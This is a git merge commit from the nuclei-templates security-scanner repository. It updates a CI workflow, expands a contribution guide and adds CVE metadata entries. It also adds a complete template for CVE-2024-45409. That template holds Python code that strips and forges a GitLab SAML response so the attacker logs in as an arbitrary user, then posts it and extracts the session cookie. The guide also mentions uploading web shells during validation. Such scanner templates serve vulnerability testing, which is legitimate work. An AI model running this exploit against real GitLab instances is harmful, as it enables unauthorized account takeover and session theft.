Merge branch 'main' into umbraco-installer

patch-12
Ritik Chaddha 2024-10-06 13:42:02 +04:00 committed by GitHub
commit 7d54b1b420
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
267 changed files with 2253 additions and 566 deletions

View File

@ -17,7 +17,7 @@ jobs:
- uses: projectdiscovery/actions/setup/go@v1
with:
go-version: 'stable'
- run: go run main.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ $GITHUB_WORKSPACE/cves.json
- run: go run main.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/,$GITHUB_WORKSPACE/javascript/cves/ $GITHUB_WORKSPACE/cves.json
working-directory: .github/scripts/yaml2json
- run: md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
- uses: projectdiscovery/actions/setup/git@v1

View File

@ -1 +1,24 @@
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-8877.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/technologies/arcgis-detect.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/token-spray/api-intigriti.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml

View File

@ -1,26 +1,70 @@
# Template Contribution Guidelines
# Nuclei Contribution Guide
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. The Nuclei Templates repository stores and houses various templates for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. for the scanner provided by our team, as well as contributed by the community.
This documentation contains a set of guidelines to help you during the contribution process.
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
Thank you for helping out and remember, **no contribution is too small.**
We have over **9000+** templates contributed by **more than 800** security researchers and engineers. We hope that you contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. By contributing, you won't only help the community **❤️** but can also gain experience, increase community and peer recognition, improving your job prospects
# Submitting Nuclei Templates 👩‍💻👨‍💻
This documentation contains a set of guidelines to help you during the contribution process. We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project. Thank you for helping out and remember, **no contribution is too small.**
Below you will find the process and workflow used to review and merge your changes.
## **How Can I Contribute?**
## Step 1 : Find existing templates
- [Submitting Nuclei Templates](#Submitting-Nuclei-Templates)
- [Reporting False Negative Template](#Reporting-False-Positive-Template)
- [Reporting False Positive Template](#Reporting-False-Positive-Template)
- [Enhancing existing templates](#Enhancing-existing-templates)
- [Reporting Invalid templates](#Reporting-Invalid-templates)
- [Request Template](#Request-Template)
- [Sharing idea / feature for nuclei-templates](#Sharing-idea-/-feature-for-nuclei-templates)
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
### **Submitting Nuclei Templates**
## Step 2 : Fork the Project
**Before Submitting an Issue or Pull Request**
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) or search for endpoints before creating new one.
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
Along with the P.O.C following are the required fields in the info section for submitting new template.
1. `id`: It should be short ideally max of 3-4 words. For example `grafana-unauth-rce`
2. `name` : The name should be short in this format `<Vendor> <Product> <Version> - <Vulnerability>`
3. `author`: It can be your github/twitter username or alias. You can also create a PR to add more details associated with the author name here (https://github.com/projectdiscovery/nuclei-templates/blob/main/contributors.json)
4. `severity` : Based on the CVSS score but can vary based on the exploit and real-world impact
5. `description` : Short description of the vulnerability
6. `reference` : Please provide the reference to the POC, setup guide or the product details to help the team verify the template.
**Dos**
- If you have verified the template, mark it as `verified: true` under metadata field and share the debug data using `-debug` flag after redacting the vulnerable server information in the PR
- Make sure to add more than one matcher to prevent false positive results. Avoid short word that could be encountered anywhere
- If possible submit the vulnerable environment based on docker-compose. For example: https://github.com/vulhub/vulhub.
- We only accept templates with complete P.O.Cs instead of just detection based on version
**Dont**
- Dont not share any real world target on the PR. If you have setup an vulnerable environment please share it privately on Discord with the team to easily validate the template.
- Avoid submitting templates with weak matchers. For example: Adding GET/POST data as the matchers in the template, as it can result in false positive results on few hosts
- Dont make unnecessary changes to the existing templates like adding more requests to the templates when the existing requests or paths are good enough to verify that the bug exists
- Try to keep the requests per template as low as possible
**Best Practices**
- Make sure to add the template in the appropriate directory.
- Add part with the matchers. For example if the matcher is in response body add `part:` body
- Use `cmd` variable for RCE templates so that they are unified throughout the repo
- Use `{{username}}` and `{{password}}` variables in all authenticated templates
- Use `{{token}}` variable in all the template that deals with keys or tokens
- If there are more than 1 template for a tech create a separate folder for it
- Don't share any vulnerable URL publicly on Github or Discord channel.
- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`)
### **Submitting a PR**
**Fork the Project**
- This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
```sh
```jsx
git clone https://github.com/<your-username>/nuclei-templates
cd nuclei-templates
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
@ -28,73 +72,132 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates
- If you have already forked the project, update your copy before working.
```sh
```jsx
git remote update
git checkout main
git rebase upstream/main
```
## Step 3 : Create your Template Branch
**Create your Template Branch**
Create a new branch. Use its name to identify the issue your addressing.
- Create a new branch. Use its name to identify the issue your addressing.
```sh
```jsx
# It will create a new branch with name template_branch_name and switch to that branch
git checkout -b template_branch_name
```
## Step 4 : Create Template and Commit
**Create Template and Commit**
- Create your template.
- Add all the files/folders needed.
- After you've made changes or completed template creation, add changes to the branch you've just created by:
```sh
```jsx
# To add all new files to branch template_branch_name
git add .
```
- To commit, give a descriptive message for the convenience of the reviewer by:
```sh
```jsx
# This message get associated with all files you have changed
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.
- Try to add only one templates per Pull Request as it will make it simple for us to review and the PR will not be blocked because of one of the templates
- Multiple templates for same technology can be grouped into single Pull Request.
## Step 5 : Push Your Changes
**Push Your Changes**
- Now you are ready to push your template to the remote (forked) repository.
- When your work is ready and complies with the project conventions, upload your changes to your fork:
```sh
```jsx
# To push your work to your remote repository
git push -u origin template_branch_name
```
## Step 6 : Pull Request
**Pull Request**
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
## Need more help?🤔
### Reporting [False Negative Template](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-negative.yml)
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
You can contribute to the project by creating issue/PR for templates which are missing valid/expected result.
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
- Share you nuclei version and the path of the template
- Share the `-debug` data for the host where the template is not matching the vulnerable target
- If possible share the improved or valid matchers, references and the information to setup vulnerable environment.
> Note: If host information can not be shared publicly, please reach out to us on discord server in DM.
>
## Tip from us😇
**Creating a [False negative issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-negative.yml) or Submit a PR**
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere
- Click on the Issues Tab and then click on `new issue.`
- Click on `get started` in front of **`False Negative`**
### Reporting [False Positive Template](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-positive.yml)
You can contribute to the project by creating issue/PR for templates which are producing invalid/unexpected result.
- Share you nuclei version and the path of the template
- Share the `-debug` data and if possible the host where the template is matching the non-vulnerable target and producing invalid/unexpected result.
- If possible share the improved or valid matchers and reference to the vulnerability.
**Creating a [False positive issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-positive.yml) or Submit a PR**
- Click on the Issues Tab and then click on `new issue.`
- Click on `get started` in front of **`False Positive`**
### Enhancing existing templates
You can contribute to the project by creating issue/PR for enhancement of nuclei-templates repository which includes changing directory structure, adding new categories or fields to the templates etc
Share the reason or requirement for the enhancement and how can it improve the overall quality of the template(s).
**Creating a Issue for Suggesting Enhancements or Submit a PR**
- Click on the Issues Tab and then click on `new issue`
- Click on `get started` in front of `Enhancement request`
### Reporting Invalid templates
If you have encountered some invalid template or any template in the repo resulting in unexpected errors then please report it as invalid template. Make sure to provide the following info:
- Share you nuclei version and the path of the template
- Share the screenshot with the error and the `-verbose` output and if applicable also provide the debug data using `-debug` flag
- If this is specific to one environment and the bug dont exist on the other setup please provide the OS and details your setup
**Creating a Issue for reporting Invalid template**
- Click on the Issues Tab and then click on `new issue`
- Click on `get started` in front of `Report Issue`
### Request Template
If you have a reference to the POC of any vulnerbaility or new CVE. You can create an issue to template the template and the team will create one. Make sure to provide the following info:
- Reference to the vulnerability with the complete P.O.C
- If possible share the vulnerable docker image or steps to setup vulnerable environment
> Note: If have setup the vulnerable environment. You can share the host with the team on discord server in DM.
>
**Creating a Issue for requesting nuclei template**
- Click on the Issues Tab and then click on `new issue`
- Click on `get started` in front of `Request Template`
### Sharing idea / feature for nuclei-templates
If you have any ideas or want to request a feature for nuclei-templates you can do so by creating a new discussion.
**Creating a Discussion for sharing idea / feature**
- Click on the Issues Tab and then click on `new issue`
- Click on `open` in front of `Share idea / feature to discuss for nuclei-templates`

View File

@ -0,0 +1,124 @@
id: CVE-2024-45409
info:
name: GitLab - SAML Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response.
impact: |
An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system.
remediation: |
This vulnerability is fixed in 1.17.0 and 1.12.3.
reference:
- https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
- https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
- https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
- https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-45409
cwe-id: CWE-347
metadata:
verified: true
shodan-query: http.title:"GitLab"
product: gitlab
vendor: gitlab
tags: cve,cve2024,saml,auth-bypass,gitlab,code
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
try:
from lxml import etree
except ImportError:
raise ImportError("The 'lxml' library is not installed. Please install it using 'pip install lxml'.")
import hashlib,os
import base64
from datetime import datetime, timedelta
import urllib.parse
import requests
username = os.getenv('username')
if not username:
username='admin@example.com'
saml_response = os.getenv('SAMLResponse')
xml_content = base64.b64decode(urllib.parse.unquote(saml_response))
parser = etree.XMLParser(remove_blank_text=True)
root = etree.fromstring(xml_content, parser)
namespaces = {
'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol',
'saml': 'urn:oasis:names:tc:SAML:2.0:assertion',
'ds': 'http://www.w3.org/2000/09/xmldsig#'
}
response_signature = root.find('./ds:Signature', namespaces)
if response_signature is not None:
root.remove(response_signature)
nameid = root.find(
'.//saml:NameID',
namespaces
)
if nameid is not None:
nameid.text = username
attribute_values = root.findall('.//saml:AttributeValue', namespaces)
for attr_value in attribute_values:
attr_value.text = username
assertion = root.find('.//saml:Assertion', namespaces)
if assertion is not None:
# Create a deep copy of the assertion for digest calculation
assertion_copy = etree.fromstring(etree.tostring(assertion))
signature_in_assertion = assertion_copy.find('.//ds:Signature', namespaces)
if signature_in_assertion is not None:
signature_in_assertion.getparent().remove(signature_in_assertion)
canonicalized_assertion = etree.tostring(
assertion_copy, method='c14n', exclusive=True, with_comments=False
)
digest = hashlib.sha256(canonicalized_assertion).digest()
digest_value = base64.b64encode(digest).decode()
else:
digest_value = ''
issuer = root.find('.//saml:Issuer', namespaces)
if issuer is not None:
parent = issuer.getparent()
index = parent.index(issuer)
extensions = etree.Element('{urn:oasis:names:tc:SAML:2.0:protocol}Extensions')
digest_element = etree.SubElement(
extensions, '{http://www.w3.org/2000/09/xmldsig#}DigestValue'
)
digest_element.text = digest_value
parent.insert(index + 1, extensions)
malformed_samlresponse = urllib.parse.quote(base64.b64encode((etree.tostring(
root, pretty_print=False, xml_declaration=True, encoding='UTF-8'
))))
print(malformed_samlresponse)
http:
- raw:
- |
POST /users/auth/saml/callback HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
RelayState=undefined&SAMLResponse={{code_response}}
matchers:
- type: dsl
dsl:
- 'contains(header,"known_sign_in")'
- 'status_code == 302'
condition: and
extractors:
- type: kval
kval:
- _gitlab_session
# digest: 4b0a00483046022100aac3014dc61bab8223d36c1bd10f19aa4886b33778e2b16cf891fce7f7c24bee022100a42cd0b25c8f4a54304541ca26f508284772b55881c43962eb396092205425ff:922c64590222798bb761d5b6d8e72950

View File

@ -467,6 +467,7 @@
{"ID":"CVE-2017-5631","Info":{"Name":"KMCIS CaseAware - Cross-Site Scripting","Severity":"medium","Description":"KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-5631.yaml"}
{"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-5638.yaml"}
{"ID":"CVE-2017-5689","Info":{"Name":"Intel Active Management - Authentication Bypass","Severity":"critical","Description":"Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-5689.yaml"}
{"ID":"CVE-2017-5871","Info":{"Name":"Odoo \u003c= 8.0-20160726 \u0026 9.0 - Open Redirect","Severity":"medium","Description":"An Open Redirect vulnerability in Odoo versions \u003c= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2017/CVE-2017-5871.yaml"}
{"ID":"CVE-2017-5982","Info":{"Name":"Kodi 17.1 - Local File Inclusion","Severity":"high","Description":"Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-5982.yaml"}
{"ID":"CVE-2017-6090","Info":{"Name":"PhpColl 2.5.1 Arbitrary File Upload","Severity":"high","Description":"PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-6090.yaml"}
{"ID":"CVE-2017-7269","Info":{"Name":"Windows Server 2003 \u0026 IIS 6.0 - Remote Code Execution","Severity":"critical","Description":"Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \u003chttp://\" in a PROPFIND request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7269.yaml"}
@ -748,6 +749,7 @@
{"ID":"CVE-2019-1898","Info":{"Name":"Cisco RV110W RV130W RV215W Router - Information leakage","Severity":"medium","Description":"A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-1898.yaml"}
{"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"}
{"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"}
{"ID":"CVE-2019-19411","Info":{"Name":"Huawei Firewall - Local File Inclusion","Severity":"low","Description":"USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.\n","Classification":{"CVSSScore":"3.7"}},"file_path":"http/cves/2019/CVE-2019-19411.yaml"}
{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"}
{"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"}
{"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"}
@ -2521,6 +2523,7 @@
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"}
{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"}
@ -2573,9 +2576,11 @@
{"ID":"CVE-2024-41955","Info":{"Name":"Open Redirect in Login Redirect - MobSF","Severity":"medium","Description":"Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.\n","Classification":{"CVSSScore":"5.2"}},"file_path":"http/cves/2024/CVE-2024-41955.yaml"}
{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"}
{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
